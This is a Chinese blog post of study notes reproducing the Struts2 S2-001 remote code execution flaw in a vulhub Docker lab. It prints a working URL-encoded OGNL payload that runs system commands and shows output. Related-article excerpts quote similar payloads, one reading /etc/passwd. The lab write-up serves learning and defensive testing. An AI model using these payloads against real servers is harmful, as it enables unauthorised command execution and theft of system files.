s2-001漏洞复现

最新推荐文章于 2024-03-14 10:19:36 发布
最新推荐文章于 2024-03-14 10:19:36 发布
阅读量320 收藏
点赞数
文章标签: struts java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74859491/article/details/129485226
版权

本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

准备工具&简介

1、centos7 已开启docker :systemctl restart docker.service()
2、进入vulhub —struts2 : cd vulhub/struts2
3、启用测试环境:docker-compose up -d 
4、PC机打开网址:youIP:8080 
5、开启Burpsuite抓包测试,修改Payload

复现过程

开启docker进入vulhub —struts2—s2-001命令:cd vulhub/struts2/s2-001

查看s2-001目录命令:ls

(Readme.md 英文说明, Readme.zh-cn.md 中文说明)
先查看说明文件 命令:cat Readme.zh-cn.md 

 启动容器
命令:docker-compose build
           docker-compose up -d

 

PC机网页访问:

youIP :8080

显示登录页面

开启代理,开启BP 抓包

 

 

 payload:%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

在例:whoami 修改为:pwd
回显出路径:/usr/local/tomcat

 执行了payload 里的语句 whoami ,回显 root
执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat

 

崇辰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Struts2-S2-029漏洞分析1
08-08
我把OGNL表达式的执行流程走了一遍,发现Struts2开发人员在对ONGL表达式中的赋值操作时将判断条件写反了,这样一来就直接导致了前边做的所有的安全策略,在
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
文件包含struts-2.5.16-源码+示例,利用附件文件可以很方便的搭建出调试S2-057的漏洞环境,欢迎各位取用
S2-001 漏洞复现
qq_36594628的博客
07-23 439
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
S2-001漏洞复现
baidu_38844729的博客
11-14 373
漏洞原理 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 漏洞利用 切换到s2-001目录下,搭建启动测试环境 ...
Struts2 远程代码执行漏洞复现S2-001
最新发布
Welcome To Myon'Blog !
03-14 773
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
[struts2]s2-001
satasun的博客
12-09 239
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
S2-001 远程代码执行漏洞
EC_Carrot的博客
08-05 267
漏洞简介 漏洞复现 执行任意命令: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#
S2-007 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 1333
漏洞原理 如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 POC a.获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} b、获取web路径 %{ #req=@org.apache.struts2...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
Structs2系列漏洞 S2-001漏洞复现
weixin_43885355的博客
03-31 357
Structs2系列漏洞 S2-001漏洞复现 参考链接: https://blog.csdn.net/qq_29647709/article/details/84945159 0x01漏洞简介         该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{
S2-001 远程代码执行漏洞(漏洞复现)
主题模板站的博客
01-07 183
1. 漏洞描述该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行漏洞版本:Struts 2.0.0 - Struts 2.0.8。
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2418
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
Struts2漏洞S2-001复现
hklearner的博客
03-30 1664
Struts2 漏洞S2-001复现学习笔记 S2-001复现 原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/
S2-001 远程代码执行 漏洞复现
Senimo
07-27 2560
S2-001 远程代码执行 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 二、漏洞影响 三、漏洞复现 1
Java安全』IntelliJ IDEA搭建老版本Struts 2环境_S2-001复现环境搭建
Ho1aAs‘s Blog
07-28 574
前言 为了复现S2-001做准备,IDEA版本为2021.2、Struts2版本为2.0.8 一、下载Struts 2 lib 二、IDEA创建Struts2项目 三、配置修改和创建demo
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts 2.0.0-2.1.8.1。你可以在vulhub的GitHub仓库中找到搭建了该漏洞的示例环境。首先,你可以使用能够爆出路径的payload验证目标网址是否存在s2-005漏洞。然后,使用执行代码的payload进行利用。需要注意的是,不同的博主可能会提供不同的payload,所以如果一个payload无法利用,可以尝试其他的payload。 关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值